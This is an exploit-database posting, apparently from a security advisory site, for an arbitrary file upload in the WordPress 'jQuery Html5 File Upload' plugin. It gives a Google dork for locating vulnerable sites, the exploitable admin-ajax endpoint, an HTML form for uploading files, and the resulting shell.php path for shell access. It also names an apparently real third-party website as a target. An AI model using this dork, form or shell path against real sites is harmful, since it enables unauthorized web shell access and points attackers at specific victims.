Wordpress Plugins jQuery Html5 File Upload

2016.04.18
Credit: Hacker Khan
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

########################## # Exploit Title: Wordpress Plugins jQuery Html5 File Upload # Google Dork: inurl:/wp-content/plugins/jquery-html5-file-upload/ # We Are Iranian Anonymous Iranonymous.org # Discovered By: Hacker Khan ################ # Vendor Homepage: https://wordpress.org/plugins/jquery-html5-file-upload/ # Software Link: https://downloads.wordpress.org/plugin/jquery-html5-file-upload.3.0.zip # Version: Any Version # Tested on: Windows, Linux ############################# Poc : targe.com/wp-admin/admin-ajax.php?action=load_ajax_function ############################ Exploit HTML : <center> <br><br><br><br><br><br><br><br><br><br><br><br><br> <font face="Iceland" color="red" size="7">jQuery File Upload By Hacker Khan</font><br> <form method="POST" action="target.com/ enctype="multipart/form-data"> <input type="file" name="files[]" /><button>Upload</button> ########################### Shell Access : http://www.target.com/wp-content/uploads/files/guest/shell.php ########################### Target : http://students4students.us/wp-admin/admin-ajax.php?action=load_ajax_function ############################# #Thanks to : MR.Khatar |||| ll_azab-siyah_ll || Rising || Blackwolf_Iran ||Sh@d0w || MaMaD_Malware|| OnE_H4Ck3R || Shdmehr || B.D Happy Boy || MR.zarvan || Security Soldier || InfernaL And All Of Iranian Anonymous


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top